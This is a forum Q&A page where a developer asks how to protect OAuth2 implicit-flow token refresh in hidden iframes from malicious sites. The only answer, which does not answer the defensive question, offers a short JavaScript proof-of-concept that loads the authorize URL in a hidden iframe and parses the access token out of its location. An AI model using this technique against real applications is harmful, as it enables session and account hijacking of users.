Reputation: 611
How to protect Oauth2 implicit flow from iframe
I'm using Oauth2 implicit flow to secure Single Page Application & Rest API.
If you are unfamiliar with oauth2 implicit flow, quick overview:
We are using hidden iframes & little javascript to get access tokens & "refresh"(actually getting new token, as long as users are logged in the authorization server) it when expires.
Now it looks very easy for malicious site to contain the same iframe and just retrieve the access token from the hash fragment if the user is logged in.
I've looked at X-Frame-Options they can't prevent redirects and only can prevent from rendering the content inside. But our token is on the url fragment which already arrived to the browser.
As this was our "own" app we skipped the approval step by the user, granted access token automatically as long as the redirect_uri matches & user logged in. Probably this one is also sacrificing our security one step more.
This looks like an unacceptable security hole, is there any suggestions?
Upvotes: 2
Views: 3119
Answers (1)
Reputation: 416
I have the same issue.. after viewing your source and extracting the parameters you send, a malicious user could do this:
var uri = addQueryString(authorizeUri, {
'client_id': '11',
'redirect_uri': returnUri,
'state': nonce,
'scope': 'bio notes',
'response_type': 'token',
});
console.log(uri);
$('body').append(`<iframe src="${uri}"/>`);
$('iframe').css({
'display' : 'none'
})
$('iframe')[0].addEventListener("load", function () {
var uriWithToken = $('iframe')[0].contentWindow.location.href;
token = uriWithToken.split('access_token')[1].split("=")[1];
expires = uriWithToken.split('expires_in')[1].split("=")[1];
console.log(uriWithToken);
console.log("TOKEN = " + token);
console.log("EXPIRES = " + expires);
$('iframe').remove();
});
Thank you very much for your token ill be on my way...
Upvotes: 1
Related Questions
- Why is a iFrame used for Silent Authentication?
- Silent Authentication feedback from IFrame
- OAuth 2 authentication for both iframe and api
- Using oauth2 in an iframe application
- OAuth2 Implicit Flow - IFrame Refresh Identity
- ClickJacking threat while using hidden iFrames for refreshing tokens in OAUTH Implicit flow
- How to protect Access Token sent to Client during Implicit Grant flow from being hijacked?
- Security Issue Related to OAuth Flow
- Google oauth2 authorization in iframe/popup
- Is it possible to get oAuth to stay within an iFrame and not take up the parent window?